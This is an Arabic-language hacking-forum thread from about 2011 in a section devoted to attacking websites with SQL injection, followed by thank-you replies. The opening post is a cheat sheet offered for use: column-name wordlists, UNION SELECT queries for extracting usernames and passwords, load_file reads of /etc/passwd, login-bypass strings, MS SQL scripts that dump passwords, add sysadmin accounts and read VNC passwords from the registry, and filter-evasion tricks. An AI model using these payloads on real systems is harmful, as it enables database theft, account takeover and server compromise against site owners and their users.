نحن مع غزة
الـرئـيـسـيـة الـمـنـتـدى سـؤال & اجـابـة الـتـبـرع بـالـدم الاسـتـضـافـة هـلال لـيـنـكـس الـقـرآن الـكـريـم Dz-SeC team


التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"


مطلوب مشرفين على كامل اقسام المنتدى


أخي / أختي , إن تسجيل عضوية جديدة في منتدى شبكة الجزائر للجميع لا يهدف إلى زيادة الأعضاء مطلقا
فلا خير في عضوية عدد مشاركاتها صفرا فنحن نرفض يوميا الكثير من العضويات المشكوك في أمرها
سواء كان هدفها الإعلانات الغير شرعية أو تخريب الموضوعات الخ , كل هذا حتى يبقى المنتدى
ساحة جادة عطرة تجود بالخير لكل زوارها وأعضائها
وصدقة جارية لكل من يشارك في كتابة معلومة تفيد غيره سوف يشكر الله عليها وهو في جوف الأرض ...

لذلك نطلب منك التسجيل بل ونلح عليك إن كان هدفك هو أن تصنع صدقة جارية لا تنقطع إلى يوم الدين بمساعدة إخوانك في نشر الخير .

للتسجيل اضغط هنا وأملأ البينات المطلوبة بشكل صحيح ومن ثم انتظر حتى نقوم بتفعيل حسابك وابدأ رحلتك في صناعة صدقة جارية .

وتذكر قول سيد الخلق " إذا مات ابن آدم انقطع عمله إلا من ثلاث صدقة جارية أو علم ينتفع به أو ولدٍ صالح يدعو له "

   

[ منتدى حـقن قواعد البيانات | Sql injcetion ] قسم يهتم باهم ثـغرات الحقن .. حقن قواعد البيانات واهم الطرق المستعملة في ذلـك ,

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 01/01/2011, 22:54   المشاركة رقم: 1
المعلومات
الكاتب:
 ViRuS_Ra3cH  
اللقب:
الصورة الرمزية
 
الصورة الرمزية ViRuS_Ra3cH

البيانات
التسجيل : Mar 2010
العضوية : 2
الاهتمامات : DZ
الإقامة : DZ
المواضيع : 466
الردود : 629
المجموع : 1,095
بمعدل : 0.19 يوميا
الاختراقات : [ra3ch]
مجتمعنا : []
الصنف : Not Hacker
آخر تواجد : 02/01/2018/12:49
سبب الغياب : معكم ألي أخر ضربه أدا كتب ربي..
معدل التقييم: 10
نقاط التقييم: 18
ViRuS_Ra3cH is on a distinguished road
شكراً: 493
تم شكره 194 مرة في 101 مشاركة

 Algeria


الإتصالات
الحالة:
ViRuS_Ra3cH غير متواجد حالياً
وسائل الإتصال:

افتراضي هده جميع اوامر التي تحتاجها للحقن

كود:
السلام عليكم



هده جميع اوامر التي تحتاجها للحقن
نبـدإ
*_&

تخمين أسماء قواعد البيانات
user
users
mysql.user
mysql.db
mysql.dbh
smf_members
users+where+user_id=1
admin+where+admin_id=1
admin
accounts
std_users
sys_user
main
sf_usr
tt_user
mo_user
mos_user
login
mysql.user
mysql.users
admin_login
jos_users
jos_session
wp_users
bg_users
usuarios
login_username
user_login
admin_sections
members
=========================
تخمين أسماء اليوزرات

admin
adminlogin
login
member
membername
user_name
user
users
username
user_name
loginmember
membername
admin_lastname
lastname
fristname
uname
name
user_login
aid
id
user_sections
user_username
user_id
user_first_name
========================
تخمين أسماء الباسوردات

password
pass
passwd
pwd
user_password
admin_password
pass
passwd
pwd
user_pass
user_password
=======================


اسماء اليوزرات المحتمله في قواعد البيانات وقت الحقن
user & users & user**** & admin & adminlogim & login & member & member****

user_****


الان اسماء الباسوردات المحتمله في قواعد البيانات وقت الحقن
password & pass & passwd & pwd


اسماء قواعد البيانات المحتمله في اي موقع وانت وتخمينك في الحقن هذي الكلمات المتداوله بكثره بين الناس
user
users
mysql.user
mysql.db
mysql.dbh
smf_members


ناخذ امثله على الكلمات السابقه للتوضيح وقت الحقن

الان مثلا اشم قاعدة البيانات في ( mysql.user ) في موقع ما كيف نستخرج يوزر الموقع ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

union+select+1,2,user,4,5+from+mysql.user

لوبدنا نستخرج باسورد اليوزريلي خرج لنا بيكون الاستغلال بهذا الشكلunion+select+1,2,password,4,5+from+mysql.user


مثال اخر على الكلمات السابقه للتوضيع
union+select+1,2,member****,4,5+from+smf_members


لاستخراج الجداول في قواعد البيانات وقت الحقن
union+select+1,2,table_****,4,5+from+information_s chema.tables


لاستخراج الاعمده في قواحد البيانات وقت الحقن
union+select+1,2,column_****,4,5+from+information_ schema.columns


الان مثلاً اردنا استخراج العضويه رقم ( 1 ) يكون الاستغلال بهذا الشكل

طبعاً مع تغير كلمة user الى اي كلمه تخمنها من الكلمات المستخدمه لليوزرات المذكوره سابقاً
union+select+1,2,user****,4,5+from+users+where+use rid=1/*



الان امر مهم في الحقن لقرائة ملفات السيرفر لو كان السيرفر يسمح لك بالقرائه
load_file("/هنا الاوامر")


مثال على هذا
union+select+1,load_file("/"),3,4+from+mysql.user


وتكون الاوامر داخل القوسين مثال يوضح امر قراءة حسابات السيرفر
union+select+1,load_file("/etc/passwd"),3,4+from+mysql.user


او نجرب هذا نفس الامر بس نتراجع للخلف
union+select+1,load_file("/../../etc/passwd"),3,4+from+mysql.user


الكلمات المحتمله للحصول على بيانات الـ FTP وقت الحقن

هذا الامر خاص بالبحث في الجداول
union+select+1,2,table_****,4,5+from+information_s chema.tables+where+table_****+like+'%25ftp%25'/*


هذا الامر خاص بالبحث في الاعمده
union+select+1,2,column_****,4,5+from+information_ schema.columns+where+column_****+like+'%25ftp%25'/*


FTP ملاحظه مهمه في الامرين السابقين في البحث عن بيانات الـ

'%25ftp%25' <<< في هذا الامر
----------------------

السسلام عليكم

حبيت آنزلكم .. بعض الاوآمر اللي بتفيدكم في استغلال وتخطي ثغرات SQL ..

بسم الله ..

1- حركات اساسية تستخدم لتسجيل الدخول بدون يوزر وباس :

- Login:' or 1=1--
- Pass:' or 1=1--
- http://dz4all.com/cc/newthread.php?do=' or 1=1--

########################

2- حركات اخرى معروووفة للجميع تستخدم في قواعد MsSQL:

- ' having 1=1--
- ' group by userid having 1=1--
- ' SELECT **** FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE **** = 'table****')--
- ' union select sum(column****) from table****--

########################

3- تجميع المعلومات :

- ' or 1 in (select @@version)--
- ' union all select @@version--

########################

4- انواع قواعد البيانات واهم القواعد الاساسية الملحقة بها :

-->SYS.USER_OBJECTS (USEROBJECTS)
-->SYS.USER_VIEWS
-->SYS.USER_TABLES
-->SYS.USER_VIEWS
-->SYS.USER_TAB_COLUMNS
-->SYS.USER_CATALOG
-->SYS.USER_TRIGGERS
-->SYS.ALL_TABLES
-->SYS.TAB


MySQL
-->mysql.user
-->mysql.host
-->mysql.db

MS access
-->MsysACEs
-->MsysObjects
-->MsysQueries
-->MsysRelationships

MS SQL Server
-->sysobjects
-->syscolumns
-->systypes
-->sysdatabases

########################

5- سحب كلمات السر :

'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --

' and 1 in (select var from temp)--

' ; drop table temp --


########################

6- انشاء حسابات مستخدمين على القواعد المختلفة :

MS SQL
exec sp_addlogin '****' , 'password'
exec sp_addsrvrolemember '****' , 'sysadmin'

MySQL
INSERT INTO mysql.user (user, host, password) VALUES ('****', 'localhost', PASSWORD('pas23'))

Access
CRATE USER **** IDENTIFIED BY '123456'

Postgres (requires Unix account)
CRATE USER **** WITH PASSWORD '123456'

Oracle
CRATE USER **** IDENTIFIED BY 123456
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;
GRANT CONNECT TO ****;
GRANT RESOURCE TO ****;

########################

7- استدعاء ملف من السيرفر :

- ' union select 1,load_file('/etc/passwd'),1,1,1;

########################

8- معرفة اسم السيرفر والكونفج :

- ' and 1 in (select @@server****)--
- ' and 1 in (select server**** from master.sysservers)--

########################

9- الحصول على اسم المستخدم والباسورد للـفي ان اس :

- '; declare @out binary(8)
- exec master..xp_regread
- @rootkey = 'HKEY_LOCAL_MACHINE',
- @key = 'SOFTWARE\ORL\WinVNC3\Default',
- @value_****='password',
- @value = @out output
- select cast (@out as bigint) as x into TEMP--
- ' and 1 in (select cast(x as varchar) from temp)--

########################

10- التحايل على صناديق ادخال اسم المستخدم وكلمات السر :

- ' OR 'unusual' = 'unusual'
- ' OR 'something' = 'some'+'thing'
- ' OR '****' = N'****'
- ' OR 'something' like 'some%'
- ' OR 2 > 1
- ' OR '****' > 't'
- ' OR 'whatever' in ('whatever')
- ' OR 2 BETWEEN 1 and 3

########################

11- النقطة السابقة نفسها لكن باستخدام الفواصل والشرطات نستخدم /**/ لتخطي الفلتره على علامة + او المسافة :

-->'/**/OR/**/1/**/=/**/1
-->User****:' or 1/*
-->Password:*/=1--
-->UNI/**/ON SEL/**/ECT
-->(Oracle) '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
-->(MS SQL) '; EXEC ('SEL' + 'ECT US' + 'ER')



###########



آخر مواضيع » ViRuS_Ra3cH

توقيع : ViRuS_Ra3cH

IS-SEC.ORG is ThE NaMe AnD HaKiNg Is ThE GaMe So FoRgEt ThE Name AnD LeT'S PlaY ThE GaMe
=======
[email protected]
=====
ViRuS_Ra3cH
====

===

عرض البوم صور ViRuS_Ra3cH   رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ ViRuS_Ra3cH على المشاركة المفيدة:
Smail002 (12/01/2011)
قديم 01/01/2011, 22:59   المشاركة رقم: 2
المعلومات
الكاتب:
 xdvb  
اللقب:
.: طالب اختراق المواقع :.

الإتصالات
الحالة:
xdvb غير متواجد حالياً
وسائل الإتصال:

جزاك الله كل خير اخي رعش

راك عجبتني ياسر

.

عرض البوم صور xdvb   رد مع اقتباس
قديم 01/01/2011, 23:02   المشاركة رقم: 3
المعلومات
الكاتب:
 hacker almooot  
اللقب:
.: مشرف قسم اختراق الاجهزة :.

الإتصالات
الحالة:
hacker almooot غير متواجد حالياً
وسائل الإتصال:

بوركت اخي رعش

عرض البوم صور hacker almooot   رد مع اقتباس
قديم 12/01/2011, 00:43   المشاركة رقم: 4
المعلومات
الكاتب:
 lennix  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
lennix غير متواجد حالياً
وسائل الإتصال:

الله يحفظك صديقي و انشاء الله ديما جديد معاك

عرض البوم صور lennix   رد مع اقتباس
قديم 12/01/2011, 08:23   المشاركة رقم: 5
المعلومات
الكاتب:
 Smail002  
اللقب:
.: مستشار اول :.

الإتصالات
الحالة:
Smail002 غير متواجد حالياً
وسائل الإتصال:

باركة الله فيك اخي رعش
و **** على الاوامر المفيدة

عرض البوم صور Smail002   رد مع اقتباس
قديم 13/02/2011, 12:03   المشاركة رقم: 6
المعلومات
الكاتب:
 lennix  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
lennix غير متواجد حالياً
وسائل الإتصال:

جزاك الله كل خير اخي

عرض البوم صور lennix   رد مع اقتباس
قديم 19/02/2011, 13:26   المشاركة رقم: 7
المعلومات
الكاتب:
 moja4ed_fz  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
moja4ed_fz غير متواجد حالياً
وسائل الإتصال:

مشكور بارك الله فيك

عرض البوم صور moja4ed_fz   رد مع اقتباس
قديم 29/05/2011, 16:54   المشاركة رقم: 8
المعلومات
الكاتب:
 zerocool  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
zerocool غير متواجد حالياً
وسائل الإتصال:

تسلم ايدك يعطيك الف عافيه

عرض البوم صور zerocool   رد مع اقتباس
قديم 17/12/2012, 12:45   المشاركة رقم: 9
المعلومات
الكاتب:
 abitu  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
abitu غير متواجد حالياً
وسائل الإتصال:

مشكورررررررررر

عرض البوم صور abitu   رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 

(أظهر الكل الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 97
a.s.m.a.r Hack3r , abdotv , abdou17 , abitu , Admin , all4dz , aminox dz , amrhakers , ANDERSON , arafa001 , asesino04 , azizou , A__M__K , مهدي جلال , مراد , bachelor , BADER , bat4800 , BboyZaki , BillY4MaX , ال بطيور , البرنس هاشم , الديلر الفلسطيني , اعمل بصمت , dabelzero , Diabloo-16 , dimadz , Dr $0uf1 , Dr.HaCkEr , DZ-cOmbattant , dz-evil , Erorr , ExPLo!T_Dz , faris , farouk ch , gravekeeper , ha2010ha , hack4live , hacker almooot , hamzaoo7 , harris01 , HiDDenHAckER , highvip , ib4dz , Igor000rogI , illuminat , jokER-spY , JokEr2 , kadman , kameldz , khalil160 , lennix , loGin.Dz , lupaka , ManiMan43 , maro.sophe , MdMn HaCk3r , Microsoft-Dz , mohaz , mohmax , moja4ed_fz , mond , n4dz , Nany073 , NEVER HaCKEr , nightman_alg , o0o , omar , سردينة2009 , rabi3o_gabes , rahim dz , S!N0 , s3cur1ty , S4wDz , seaffreeman , sH3LL , simoman , SK-V!rus , Smail002 , SMOG , syrian thunder , Th3 WiTch3r-Dz , The MaSk , toxine , Tryagy , عبد الصمد. , عبدو الجزائري , vigital , ViRuS_Ra3cH , wald-driouch , X-P , xdvb , yasMouh , zakistarman , zerocool , ZiRbE$t , zizou dika

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
جميع اوامر الينكس من a الى z بالترتيب yasMouh نـظـام Linux 7 04/03/2015 18:48
اسطوانه تجمع الكثير من ادوات التي تحتاجها في اختراق المواقع yasMouh قسم الاسطوانات 6 04/11/2013 03:31
اوامر الدوس و التي تقابلها في اليونكس لكل هكر ويب MdMn HaCk3r [ مـنتدى حمايه المواقع والسيرفرات | Hacking Site's & Servers ] 3 17/12/2012 12:52
5 إضافات كروم قد تحتاجها يوميا ADMINISTRATOR [ منتدى اخبــــار الشبكـــة] 0 14/11/2010 07:49

الساعة معتمدة بتوقيت جرينتش +1 . الساعة الآن : 21:43.
Copy Right Des 2010 - 2014 To is|sec Organization, Des By  yasMouh 
Powered By vBulletin Special Edition, Secured By Dz-SeC team
Support by Dz-SeC team




RSS RSS 2.0 XML MAP HTML



 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115